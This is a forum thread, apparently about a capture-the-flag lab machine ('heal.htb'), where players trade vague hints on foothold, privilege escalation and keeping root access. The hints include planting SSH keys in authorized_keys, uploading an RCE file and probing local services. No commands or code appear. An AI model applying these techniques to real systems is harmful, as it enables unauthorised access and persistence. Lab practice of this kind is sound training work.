Can anyone give me some info on what the path from foothold to user was? I have rooted the box from what might be an unintended path. Feel free to DM.
I get the root but not able to get persistence over root account⌠any help/hint guys.
1 Like
Generate an ssh key. You need to be quick tho 
Thanks, managed to add my keys into authorized keys⌠but if i keep my listening open it return the shell again in loop matterâŚ
I had the same issue, but once you have generated and SSH key you can maintain persistence that way
Iâve just taken another look at this. There is a small modification you can make against the script that you are uploading against the web-service. The field you are looking for is quite obvious as it specifies a timeout valueâŚ
1 Like
anyone please help i got the www- data shell and find a *****sql in the process . but i am stuck here how to priv esc from this point
Maybe try taking a closer look at the other interesting processes running that we could potentially exploit.
1 Like
something like a port starting with 8***
Looks interesting to me 
can u give a hint 
Feel free to DM me with what youâve found out/what youâve already tried and Iâll be able to help give you some guidance
I have ssh with the userâs credential but idk where to go from here to get root privilege. i used netstat to identify ports and ps aux but I canât find a path. I tried doing some port forwarding but it is not working. I read the other comments but I do not get it. What am i doing wrong???
iIâm getting problems accesing the RCE file. It is already uploaded but i cannot find itâs URL. Any help/hints? Iâve tried all the common ones, including the exploit.py but none has worked
Glad to see a box I can finally do on my own 
Just got user, not too bad but I think I just got lucky with my enum. Do the usual enum and youâll find what youâre looking for in terms of foothold.
hi, can you help me in invalid token thing, not able to understand whats wrong.
Stuck at api.heal.htb, found api.heal.htb/download, but canât figure out what to do next. Any hint would be appreciated.
Hi, I am stuck at the foothold canât find anything to privesc. Any hints or help?
How do you know the app is running on Ruby on Rails ?